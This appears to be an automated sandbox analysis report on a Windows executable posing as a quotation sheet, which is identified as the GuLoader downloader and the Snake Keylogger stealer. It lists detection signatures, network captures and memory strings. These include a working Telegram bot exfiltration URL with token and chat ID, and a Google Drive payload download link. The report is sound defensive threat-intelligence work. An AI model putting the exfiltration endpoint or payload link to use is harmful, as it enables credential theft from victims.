Windows Analysis Report
z1QuotationSheetVSAA6656776.exe

Overview

General Information

Sample name: z1QuotationSheetVSAA6656776.exe
Analysis ID: 1480054
MD5: cfb41760f84e1e70bade0ca7394d424b
SHA1: 139d1068c52255526ec38fe7ce0c48c365492712
SHA256: a2be0d024f1ed07193631fd4bcf91b224685a2624a3396dedbed5d071c29889f
Infos:

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Obfuscated command line found
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: z1QuotationSheetVSAA6656776.exe Avira: detected
Found malware configuration
Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"}
Multi AV Scanner detection for submitted file
Source: z1QuotationSheetVSAA6656776.exe ReversingLabs: Detection: 50%

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784BBC8 CryptUnprotectData, 131_2_3784BBC8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784C302 CryptUnprotectData, 131_2_3784C302
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784C250 CryptUnprotectData, 131_2_3784C250
Uses 32bit PE files
Source: z1QuotationSheetVSAA6656776.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2
Source: z1QuotationSheetVSAA6656776.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00406167 FindFirstFileA,FindClose, 0_2_00406167
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405705
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00402688 FindFirstFileA, 0_2_00402688
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00406167 FindFirstFileA,FindClose, 131_2_00406167
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 131_2_00405705
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00402688 FindFirstFileA, 131_2_00402688
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 0016F1FEh 131_2_0016F01B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 0016FB88h 131_2_0016F01B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 131_2_0016E530
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 131_2_0016EB63
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 131_2_0016ED44
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37841A38h 131_2_37841620
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37841471h 131_2_378411C0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784F9A7h 131_2_3784F700
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784FDFFh 131_2_3784FB58
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784F54Fh 131_2_3784F2A8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then mov esp, ebp 131_2_3784DEB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784F0F7h 131_2_3784EE50
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784E847h 131_2_3784E5A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784EC9Fh 131_2_3784E9F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37840BB1h 131_2_37840900
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 3784E3EFh 131_2_3784E148
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37841A38h 131_2_37841966
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37841011h 131_2_37840D60
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37840751h 131_2_378404A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 378402F1h 131_2_37840040
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B92E57h 131_2_37B92BB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9B4A3h 131_2_37B9B168
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B99E58h 131_2_37B99BB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B91447h 131_2_37B911A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9189Fh 131_2_37B915F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B98877h 131_2_37B985D0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B999D7h 131_2_37B99730
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 131_2_37B95F18
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9AFB7h 131_2_37B9AD10
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 131_2_37B95F15
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B925A7h 131_2_37B92300
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9841Fh 131_2_37B98178
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B929FFh 131_2_37B92758
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B90FEFh 131_2_37B90D48
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B93B5Fh 131_2_37B938B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9AB5Fh 131_2_37B9A8B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9214Fh 131_2_37B91EA8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9073Fh 131_2_37B90498
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B99127h 131_2_37B98E80
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B97F9Fh 131_2_37B97CF8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B90B97h 131_2_37B908F0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9957Fh 131_2_37B992D8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B98CCFh 131_2_37B98A28
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9A2AFh 131_2_37B9A008
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B932AFh 131_2_37B93008
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B9A707h 131_2_37B9A460
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B93707h 131_2_37B93460
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B91CF7h 131_2_37B91A50
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 4x nop then jmp 37B902E7h 131_2_37B90040
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View IP Address: 172.67.177.134 172.67.177.134
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034F59000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comd
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D69000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/d
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgd
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: z1QuotationSheetVSAA6656776.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: z1QuotationSheetVSAA6656776.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgd
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917798214.0000000006260000.00000004.00001000.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004475000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004438000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/z
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.0000000004495000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download5
